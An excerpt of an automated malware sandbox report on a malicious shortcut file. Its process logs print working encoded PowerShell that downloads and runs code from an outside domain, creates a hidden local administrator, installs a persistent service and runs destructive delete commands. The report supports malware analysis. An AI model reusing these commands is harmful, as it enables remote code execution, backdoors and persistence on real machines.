Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFBBA99088D	9_2_00007FFBBA99088D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FFBBA30BB69	24_2_00007FFBBA30BB69

Source: Joe Sandbox View

Dropped File: C:\Windows\Temp\myRdpService.exe 5744321DFC2240023EF89A8D3A4B57C635FEDFEF0E265F1C8F7971AA9F635C34

Source: svczHost.exe.9.dr

Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Source: 35.2.myRdpService.exe.7ff796c80000.0.unpack, type: UNPACKEDPE	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
Source: 00000023.00000002.25572623962.00007FF797186000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
Source: Process Memory Space: powershell.exe PID: 4012, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: svczHost.exe PID: 8876, type: MEMORYSTR	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
Source: Process Memory Space: myRdpService.exe PID: 4280, type: MEMORYSTR	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump

Source: classification engine

Classification label: mal100.troj.evad.winLNK@61/53@1/2

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8292:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1276:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8984:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1276:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8884:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4540:120:WilError_03
Source: C:\Windows\Temp\myRdpService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4540:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9060:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9060:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\STARTUAC
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8884:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5344:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-15206890
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:304:WilStaging_02

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kui5smt.na0.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Temp\myRdpService.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: ny.lnk.d.lnk

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "STaRT /MiN "" POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="" && exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Detailed information on policy benefits and commission levels for employees after probationary period Storytailors.docx" /o ""
Source: unknown	Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: unknown	Process created: C:\Windows\Temp\svczHost.exe C:\Windows\Temp\svczHost.exe nonbo1 akademiiiiiiii.online 46d578f8ebeb0d298af9e0abba20aa6630bf759e378b0ee836f8ea55b25f08ca80e36c8f3c85f8f090ed84d188970ebb9376096bba1965529122fe3306bc0716
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto & net start "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: unknown	Process created: C:\Windows\Temp\myRdpService.exe C:\Windows\Temp\myRdpService.exe nonbo1
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Detailed information on policy benefits and commission levels for employees after probationary period Storytailors.docx" /o ""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto & net start "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
